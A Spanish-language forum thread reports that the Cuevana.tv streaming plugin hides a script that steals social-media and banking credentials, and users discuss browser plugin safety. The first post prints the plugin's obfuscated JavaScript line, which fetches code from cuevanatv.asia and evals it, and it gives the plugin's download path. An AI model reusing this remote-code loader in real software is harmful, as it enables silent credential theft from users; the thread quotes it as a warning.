El Plugin de Cuevana.tv roba datos de usuarios

[Darkslayer]

Cuevana.tv, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de “phising” (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene codigo malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.

Al parecer, al intentar visionar contenido de su sitio, éste pide autorización para instalar un complemento (plugin) para tu navegador (tanto firefox como chrome).
Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web http://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.

Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin “Cuevana Streaming”.
Despues de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.

Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip…), despues abre el archivo “script-compiler.js” que encontrarás en la carpeta “content”.
Una vez abierto ese archivo observa la linea número 232.

Código:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))

En ella se encuentra este fragmento de código que lanza una petición hacia la web http://cuevanatv.asia que es la que captura los datos personales.

Muchos usuarios ya estan haciendo eco de la noticia bajo los hashtag #Cuevana , #CuevanaRoba y #PluginCuevana

Fuente original (Forocoches)
Fuente Menéame
Fuente Taringa

 

[NEED]

con estos plugins hay que vigilar, es recomendable no instalar plugins de webs que te lo piden, solo de flashplayer ( que es el mas cotidiano por internet ) si no uno no lo tiene o esta desactualizado.

Esas webs de "instala nuestro plugin para ver el video" no siempre es de fiar.

 

[Darkslayer]

@NEED dijo:

con estos plugins hay que vigilar, es recomendable no instalar plugins de webs que te lo piden, solo de flashplayer ( que es el mas cotidiano por internet ) si no uno no lo tiene o esta desactualizado.

Esas webs de "instala nuestro plugin para ver el video" no siempre es de fiar.

A mi me la recomendaron hace 4 ó 5 días, vi que estaba en la Chrome Store (se supone que es de fiar) y lo instalé.

Acabo de leer esto y cambiando contraseñas, eliminando el plu-gin, caché y cookies me hallo.

 

[RuBeN_MoYaNo]

Algo igual pasa también en Cinetube, que cuando intentas ver alguna película, te dice que instales un programa, cuando en realidad lo que te meten es un virus, suerte de que lo detecté a tiempo y pude eliminarlo, porque si no... Ya uno no se puede fiar de ninguna aplicación ni página hoy en día XXXD.

 

[NEED]

tambien e visto webs que, si tienes cosas como el adblock, te obligan a pararlo para poder entrar en la web

 

[RuBeN_MoYaNo]

@NEED Yo también he visto páginas de esas, que cualquier aplicación que tengas de Chrome te obligan a desactivar la aplicación para poder entrar, pero siempre son las que contienen anuncios mayoritariamente.

 

[Artista]

Y lo peor es que se les pilla y a estos tipos no les pasa nada... Que asco de seres humanos...

 

[Tatoopowa]

Por cosas como estas yo solo me bajo los plugins de la store del Chrome, todo de ahi

 

[Karlos]

Vaya tela.. Menos mal que no sabia ni de su existencia que igual hubiese caido

 

[CharlyXero]

@Tatoopowa dijo:

Por cosas como estas yo solo me bajo los plugins de la store del Chrome, todo de ahi

Ni eso :buf:

@Darkslayer dijo:

@NEED dijo:

A mi me la recomendaron hace 4 ó 5 días, vi que estaba en la Chrome Store (se supone que es de fiar) y lo instalé.

Acabo de leer esto y cambiando contraseñas, eliminando el plu-gin, caché y cookies me hallo.

 

[romanturbo]

Lo lei en forocoches, y vaya tela. Suerte que nunca habia usado esa pagina.